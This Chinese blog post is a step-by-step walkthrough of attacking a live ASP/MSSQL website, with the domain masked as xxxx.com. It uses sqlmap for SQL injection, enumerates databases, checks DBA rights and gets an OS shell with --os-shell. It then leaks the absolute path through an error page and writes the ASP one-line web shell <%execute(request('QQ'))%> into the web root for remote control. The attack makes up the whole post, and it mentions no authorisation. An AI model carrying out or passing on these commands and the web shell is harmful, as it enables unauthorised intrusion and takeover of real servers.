sqlmap作为最重要的注入工具之一,学会如何使用以及用它帮助我们拿到shell也是非常关键的。

  1.寻找目标注入点,并用简单的注入方式使其报错:

  初步判断存在注入

  2.使用sqlmap来进一步判断

  sqlmap -u “http://xxxx.com/main_tour_show_main.asp?id=45”

  可见是可以注入的

  还获取到了部分有用的信息(mssql,asp,iis10.0等)

  3.爆破数据库名

  sqlmap -u “http://xxxx.com/main_tour_show_main.asp?id=45”? –dbs

  但是目测这些数据库里应该没有存放管理员账号和密码的,于是继续爆破表名和字段名

  还真的没什么东西,这样的话直接拿后台是不行了,但是还有别的办法

  4.先查看当前数据库用户权限

  sqlmap -u “http://xxxx.com/main_tour_show_main.asp?id=45”? –is-dba

  权限还是很大的,那我们试一下能不能执行命令

  sqlmap -u “http://xxxx.com/main_tour_show_main.asp?id=45”? –os-shell

  并执行dir命令

  现在可以判断此为windows系统,我们可以往里面写一些文件,但是要想访问,需要知道绝对路径,可是我们并不知道。

  5.获取绝对路径的方法有很多,我用的是报错

  访问一个不存在的文件

  拿到绝对路径D:\www_root\happyholiday\

  6.写入文件测试

  在–os-shell下执行

  echo ttt>D:\www_root\happyholiday\1.txt

  可以成功写入

  7.写入ASP一句话木马

  echo “<%execute(request(“QQ”))%>” >D:\www_root\happyholiday\21.asp

  并用菜刀连接

  拿到shell,后渗透过程这里不再赘述

 
目前共有0条评论
  • 暂无Trackback
你目前的身份是游客,评论请输入昵称和电邮!